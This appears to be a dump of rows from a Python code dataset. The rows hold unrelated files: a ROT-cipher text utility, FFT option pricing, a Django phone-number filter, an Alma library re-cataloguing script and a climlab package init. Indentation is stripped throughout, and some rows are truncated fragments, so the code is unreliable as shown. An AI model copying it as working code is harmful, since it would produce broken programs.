string_path=r"C:\Users\Rives\Downloads\Quizzes\Quiz 0 Overwrite Number 1.txt",
encryption_algorithm="rotate",
algorithm_key=1,
shift_left=True
)
print("Encrypt ROT1 with default values.")
# pprint.pprint(
# dict_processedtext
# )
print(dict_processedtext["output_file"])
dict_processedtext2 = process_textfile(
string_path=dict_processedtext["output_file"],
encryption_algorithm="rotate",
algorithm_key=1,
output_folderpath=r"C:\Users\Rives\Downloads\Decryptions",
output_filename="Quiz 0 Overwrite Number 1 Decrypted",
shift_left=False
)
print("Decrypt ROT1 with all values user-supplied.")
print(dict_processedtext["output_file"])
for i in range(2):
dict_processedtext3a = process_textfile(
string_path=r"C:\Users\Rives\Downloads\Quizzes\Quiz 0 Overwrite Number 2.txt",
encryption_algorithm="rotate",
algorithm_key=1,
output_folderpath=r"C:\Users\Rives\Downloads\Encryptions"
)
print(dict_processedtext3a["output_file"])
dict_processedtext3b = process_textfile(
string_path=dict_processedtext3a["output_file"],
encryption_algorithm="rotate",
algorithm_key=1,
output_folderpath=r"C:\Users\Rives\Downloads\Decryptions",
output_filename="Quiz 0 Overwrite Number 2 Decrypted",
shift_left=False
)
print(dict_processedtext3b["output_file"])
return None
def main():
while True:
print("Press Enter or New Line to skip entering any input.\t")
task = input("Encrypt or decrypt? Encrypts by default. Press E/D.\t")
algo = input("Algorithm? Uses Rotate by default.\t")
algorithm_key = float(input("Key? Uses 1 by default.\t"))
input_filepath = input(
"""Mandatory / Required.
Full path of target file. Includes file name and extension.\n""")
output_folder = input(
"Optional. Give the path of the output folder.\n"
)
output_file = input(
"Optional. Default output file name is EncryptDecrypt.txt.\n")
keyword_arguments = input(
"""Last question. Depends on algorithm.
Format: "key=value,key2,value2,...".
Use comma with no space as separator for two or more items.\n"""
)
while len(input_filepath) == 0:
input_filepath = input(
"""Mandatory / Required.
Full path of target file.
Includes file name and extension.\n"""
)
dict_kwargs = dict()
for pair in keyword_arguments.split(','):
try:
key, pair = tuple(pair.split('='))
dict_kwargs[key] = pair
except ValueError:
break
to_decrypt = False
if task.lower().startswith('d'):
to_decrypt = True
if len(output_folder) == 0:
output_folder = str(Path.cwd().parent / r"/EncryptDecrypt/")
if len(output_file) == 0:
output_file = "EncryptDecrypt.txt"
if len(algo) == 0:
algo = "rotate"
pprint.pprint(
process_textfile(
string_path=input_filepath,
encryption_algorithm=algo,
algorithm_key=algorithm_key,
output_folderpath=output_folder,
output_filename=output_file,
to_decrypt=to_decrypt,
kwargs_dict=dict_kwargs
)
)
print(
"""Done Running.
Press Q to quit, any other key to process another file.""")
to_quit = input()
if to_quit.lower().startswith("q"):
sys.exit()
else:
continue
# manual_test()
return None
if __name__ == "__main__":
main()
"""
Notes:
*
The declared parameter data types in python functions are not enforced as of
version 3.4.
*
For some reason, even if the name "key" was a parameter for process_textfile,
it was being passed to rot13_e as a string. In the function process_textfile,
Visual Basic also listed "key" as a string when passed to rot13_e even though
the function definition specified its data type as a float and the user input
for "key" was also converted to a float in the main function. This was caused
by a for-loop. When VS Code followed the definition of key (F12) when it
was passed to rot13_e, VS Code pointed to the temporary variable "key" in a
for-loop. The parameter name was changed as a quick fix.
- Adding an else clause to the for-loop did not fix it.
- The for-loop declaration was funciton-level code while the call to rot13_e
that bugged was inside an else-clause. The else-clause holding the call to
rot13_e was also function-level, same as the for-loop declaration. The call
to RotateCipher.rot13_e was assigned to output_string.
"""
|
5,691 | 25987c15c28e3939f9f531dbc1d4bd9bf622b5a9 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 14 01:32:26 2019
@author: himanshu
"""
import numpy as np
from scipy.interpolate import interp1d
from option import Option
class FFTPricing:
def __init__(self,
option : Option,
riskFreeRate,
volatility,
samplePoints,
bandwidth,
dampingFactor,
underlyingModel = 'GBM'):
self.__option = option
self.__r = riskFreeRate
self.__sigma = volatility
self.__N = samplePoints
self.__B = bandwidth
self.__alpha = dampingFactor
self.__model = underlyingModel
# Computes the characterstic function of a GBM.
def __charactersticFunc(self, omega):
S0 = self.__option.underlyingPrice
r = self.__r
T = self.__option.timeToExpiry
sigma = self.__sigma
alpha = self.__alpha
if self.__model == 'GBM':
x0 = np.log(S0)
mu = x0 + ((r - (sigma**2)/2)*(T))
sig = (sigma**2)*(T)/2
omega_prime = omega + 1j*(alpha+1)
return np.exp(-1j*mu*omega_prime - sig*(omega_prime**2))
elif self.__model == 'VG':
pass
# Computes the Fourier Transform of a GBM.
def __fourierTransform(self, omega):
alpha = self.__alpha
r = self.__r
T = self.__option.timeToExpiry
q_hat = self.__charactersticFunc(omega)
num = np.exp(-r*(T))*q_hat
den = (alpha - 1j*omega)*(alpha - (1j*omega) + 1)
return num/den
def optionPrice(self):
if not self.__option.expiryType == 'European':
print('Not a European Option')
return 0.0
K = self.__option.strikePrice
N = self.__N
B = self.__B
alpha = self.__alpha
h = B/(N-1)
omega = np.arange(0,N)*h
dk = 2*np.pi/(h*N)
k = np.log(20) + np.arange(0,N)*dk
dw = np.zeros(N)
dw[0] = h/2
dw[1:] = h
# FFT Algorithm
V = np.zeros(N)
for n in range(N):
nu_hat = self.__fourierTransform(omega)
inner_sum = np.sum(np.exp(1j*omega*k[n])*nu_hat*dw)
V[n] = ((np.exp(-alpha*k[n])/np.pi)*inner_sum).real
val = interp1d(k, V)
return float('{0:.2f}'.format(val(np.log(K))))
def __repr__(self):
return "FFTPricing({}, {}, {}, {}, {}, {})"\
.format(self.__option,
self.__r,
self.__sigma,
self.__N,
self.__B,
self.__alpha)
if __name__ == "__main__":
from option import European
S0 = 100
K = 110
r = 0.10
T = 1
volatility = 0.25
N = 2**10
B = 50
alpha = 10.0
print('------------------------------------------------------------------'
+'----------------------------')
option = European(S0, K, T, 'Call')
fftPricing = FFTPricing(option, r, volatility, N, B, alpha)
print(fftPricing)
print('FFT price for Call:', fftPricing.optionPrice())
print('------------------------------------------------------------------'
+'----------------------------')
option = European(S0, K, T, 'Put')
fftPricing = FFTPricing(option, r, volatility, N, B, -alpha)
print(fftPricing)
print('FFT price for Put:', fftPricing.optionPrice())
|
5,692 | 08b53ba116b0c5875d39af4ce18296d547d5891d | import json
def get_json_data(page):
with open('geekshop/json_data.json', encoding='utf-8-sig') as file:
json_data = json.load(file)
return json_data[page]
def get_json_products_data(file_path):
with open(file_path, encoding='utf-8-sig') as file:
json_data = json.load(file)
return json_data
# print(get_json_products_data('geekshop/json_products_data.json'))
# print(get_json_data('products'))
|
5,693 | 4d57fa22282d7b3f8adabedd7a04e32767181890 | from functions.service_funcs.get_data import get_data_character
def clean_room(update):
char, db_sess = get_data_character(update, return_sess=True)
# удаляем старую комнату и всю инфу о ней
if char and char.room:
if char.room.mobs:
for mob in char.room.mobs:
db_sess.delete(mob)
if char.room.items:
for item in char.room.items:
db_sess.delete(item)
db_sess.delete(char.room)
db_sess.commit()
|
5,694 | 2f15814d97708e33585ea6b45e89b5a5e69d82fe | import json
import nltk
with open('posts.json', 'r') as infile:
posts = []
for line in infile:
posts.append(json.loads(line[0:len(line)-2]))
for post in posts:
print '\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print ''.join(post['title']) + ' Posted: ' + ''.join(post['posted'])
print '\n'
print ''.join(post['original_post_link'])
print 'Keywords:'
print post['keywords']
print '\nSummary: \n'
text = nltk.Text(post['tokenized_text'])
print ' '.join(text[0:100]) + '\n' |
5,695 | b874bb37fa59d9f1194c517bedbdbafae748786e | S = input()
T = []
sen = ["dream", "dreamer", "erase", "eraser"]
s_len = len(S)
while len(T) <= s_len:
|
5,696 | 05d21a27097cf3295e9328aeafa466973a4d2611 | /home/salmane/anaconda3/lib/python3.7/_weakrefset.py |
5,697 | 5e79a8a8fe79aac900fc0c2ff1caaa73ea08ada2 | from django import template
register = template.Library()
@register.filter(name='phone_number')
def phone_number(number): # Convert a 10 character string into (xxx) xxx-xxxx.
first = number[0:3]
second = number[3:6]
third = number[6:10]
return '(' + first + ')' + ' ' + second + '-' + third
|
5,698 | 1f94ef0aae1128089b34fc952766cc3927677cdf | #!/usr/bin/python3
# -*- coding: utf-8 -*-
#Modules externes
import os
import re
import logging
import csv
import xml.etree.ElementTree as ET
from chardet import detect
#Modules maison
from Abes_Apis_Interface.AbesXml import AbesXml
from Alma_Apis_Interface import Alma_Apis_Records
from Alma_Apis_Interface import Alma_Apis
from logs import logs
SERVICE = "Recotation_en_masse"
LOGS_LEVEL = 'INFO'
LOGS_DIR = os.getenv('LOGS_PATH')
LIBRARY_CODE = 1601900000
REGION = 'EU'
INSTITUTION = 'ub'
API_KEY = os.getenv('PROD_UB_BIB_API')
FILE_NAME = 'Dewey 20201218 cotes OE Scoop V3'
IN_FILE = '/media/sf_Partage_LouxBox/{}.csv'.format(FILE_NAME)
OUT_FILE = '/media/sf_Partage_LouxBox/{}_Rapport.csv'.format(FILE_NAME)
CALL_ERROR_FILE = '/media/sf_Partage_LouxBox/{}_Anomalies_Cotes.csv'.format(FILE_NAME)
# get file encoding type
def get_encoding_type(file):
with open(file, 'rb') as f:
rawdata = f.read()
return detect(rawdata)['encoding']
def item_change_location(item,location,call):
"""Change location and remove holdinds infos
Arguments:
item {str} -- xml response of get item ws
location {str} -- new location_code
call {str} -- new call
Returns:
[str] -- mms_id, holding_id, pid
"""
mms_id, holding_id, pid = item.find(".//mms_id").text, item.find(".//holding_id").text, item.find(".//pid").text
item.find(".//item_data/location").text = location
# On nettoie la cote présente au niveau de l'exemplaire
item.find(".//item_data/alternative_call_number").text = ''
item.find(".//item_data/alternative_call_number_type").text = ''
# On ne renvoie pas les infos de la holdings
holding_data = item.find(".//holding_data")
item.remove(holding_data)
# Si un autre exemplaire lié à la même notice a déjà été traité
if mms_id in processed_record_dict:
# Si la localisation était la même que celle de l'exemplaire déjà traité
if location_code in processed_record_dict[mms_id]:
# Si les cotes sont différentes alors on créé la cote sous l'exemplaire
if processed_record_dict[mms_id][location_code] != call:
multi_call_report.write("{}\n".format(barcode))
item.find(".//item_data/alternative_call_number").text = call
return mms_id, holding_id, pid
def update_holding_data(holding,new_call):
"""Change call (852$$h) and reset call type (852 fiest indicator)
Arguments:
holding {str} -- response of get holding ws
new_call {str} -- new value for call subfield
Returns:
str -- changed data
"""
holding_data = ET.fromstring(holding)
location_field =holding_data.find(".//datafield[@tag='852']")
location_field.set('ind1', ' ')
call_subfield = holding_data.find(".//datafield[@tag='852']/subfield[@code='h']")
call_subfield.text = new_call
return ET.tostring(holding_data)
#Init logger
logs.init_logs(LOGS_DIR,SERVICE,LOGS_LEVEL)
log_module = logging.getLogger(SERVICE)
conf = Alma_Apis.Alma(apikey=API_KEY, region='EU', service=SERVICE)
alma_api = Alma_Apis_Records.AlmaRecords(apikey=API_KEY, region=REGION, service=SERVICE)
#We get all the locations for the library in a dictionnary
locations_dict = conf.get_locations(LIBRARY_CODE)
log_module.info("Liste des localisation chargée pour la bibliothèque {} :: Main :: Début du traitement".format(LIBRARY_CODE))
report = open(OUT_FILE, "w", encoding='utf-8')
report.write("Code-barres\tStatut\tMessage\n")
processed_record_dict = {}
toprocess_holding_dict = {}
multi_call_report = open(CALL_ERROR_FILE, "w", encoding='utf-8')
multi_call_report.write("code-barres\n")
###Update item sequence
# ######################
from_codec = get_encoding_type(IN_FILE)
with open(IN_FILE, 'r', encoding=from_codec, newline='') as f:
reader = csv.reader(f, delimiter=';')
headers = next(reader)
# We read the file
for row in reader:
if len(row) < 2:
continue
barcode = row[0]
# Test if new call is defined
if row[1] is None or row[1] == '':
log_module.error("{} :: Echec :: pas de cote fournie".format(barcode))
report.write("{}\tErreur Fichier\tPas de cote fournie\n".format(barcode))
continue
call = row[1].upper()
# Test if new localisation is defined
if row[3] is None or row[3] == '':
log_module.error("{} :: Echec :: pas de localisation fournie".format(barcode))
report.write("{}\tErreur Fichier\tPas de localisation fournie\n".format(barcode))
continue
# log_module.info("{} :: Main :: Début du traitement".format(barcode))
# Transform location label in location code
if row[3] not in locations_dict:
log_module.error("{} :: Echec :: La localisation {} est inconnue dans Alma".format(barcode,row[3]))
report.write("{}\tErreur Fichier\tLa localisation '{}' est inconnue dans Alma\n".format(barcode,row[3]))
continue
location_code = locations_dict[row[3]]
log_module.debug("{} :: Succes :: A affecter dans la localisation {}".format(barcode,location_code))
# Get datas item with barcode
status, response = alma_api.get_item_with_barcode(barcode)
if status == 'Error':
log_module.error("{} :: Echec :: {}".format(barcode,response))
report.write("{}\tErreur Retrouve Exemplaire\t{}\n".format(barcode,response))
continue
# Change location and remove holdinds infos
item = ET.fromstring(response)
mms_id, old_holding_id,item_id = item_change_location(item,location_code, call)
# log_module.debug("{} :: {} - {} - {}".format(barcode,mms_id,old_holding_id,item_id))
# Upadte item in Alma
set_status, set_response = alma_api.set_item(mms_id, old_holding_id,item_id,ET.tostring(item))
log_module.debug(set_response)
if set_status == 'Error':
log_module.error("{} :: Echec :: {}".format(barcode,set_response))
report.write("{}\tErreur Mise à jour Exemplaire\t{}\n".format(barcode,set_response))
continue
changed_item = ET.fromstring(set_response)
new_holding_id = changed_item.find(".//holding_id").text
processed_record_dict[mms_id] = {
location_code: call
}
if new_holding_id not in toprocess_holding_dict:
toprocess_holding_dict[new_holding_id] = {
'call' : call,
'barcode': barcode
}
log_module.info("{} :: Succes :: L'exemplaire est maintenant rattaché à la Holding {}".format(barcode,new_holding_id))
log_module.info("FIN DU DEPLACEMENT DES EXEMPLAIRES")
###Update new holding sequence
# ############################
log_module.info("DEBUT DE LA MODIFICATION DES HOLDINGS")
for new_holding_id in toprocess_holding_dict.keys():
call = toprocess_holding_dict[new_holding_id]['call']
barcode = toprocess_holding_dict[new_holding_id]['barcode']
# Get new holding
get_holding_status, get_holding_response = alma_api.get_holding(mms_id, new_holding_id)
if get_holding_status == 'Error':
log_module.error("{} :: Echec :: {}".format(new_holding_id,get_holding_response))
report.write("{}\tErreur Retrouve Holding\t{}\n".format(barcode,get_holding_response))
continue
changed_holding = update_holding_data(get_holding_response,call)
#Update new Holding in Alma
set_holding_status, set_holding_response = alma_api.set_holding(mms_id, new_holding_id,changed_holding)
if set_holding_status == 'Error':
log_module.error("{} :: Echec :: {}".format(new_holding_id,set_holding_response))
report.write("{}\tErreur Ecriture Holding\t{}\n".format(barcode,set_holding_response))
continue
log_module.debug(set_holding_response)
log_module.info("{} :: Succes :: La holding a été mise à jour".format(new_holding_id))
report.close
multi_call_report.close
log_module.info("FIN DU TRAITEMENT")
|
5,699 | 8251a9c798b3cdc2f374d0a0406ccfaa11b7c5e3 | __version__ = '0.2.11'
# This list defines all the modules that will be loaded if a user invokes
# from climLab import *
# totally out of date!
#__all__ = ["constants", "thermo", "orbital_table",
# "long_orbital_table", "insolation", "ebm",
# "column", "convadj"]
#from climlab import radiation
# this should ensure that we can still import constants.py as climlab.constants
from climlab.utils import constants
from climlab.utils import thermo, legendre
# some more useful shorcuts
#from climlab.model import ebm, column
from climlab.model.column import GreyRadiationModel, RadiativeConvectiveModel, BandRCModel
from climlab.model.ebm import EBM, EBM_annual, EBM_seasonal
from climlab.domain import domain
from climlab.domain.field import Field, global_mean
from climlab.domain.axis import Axis
from climlab.process.process import Process, process_like, get_axes
from climlab.process.time_dependent_process import TimeDependentProcess
from climlab.process.implicit import ImplicitProcess
from climlab.process.diagnostic import DiagnosticProcess
from climlab.process.energy_budget import EnergyBudget
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.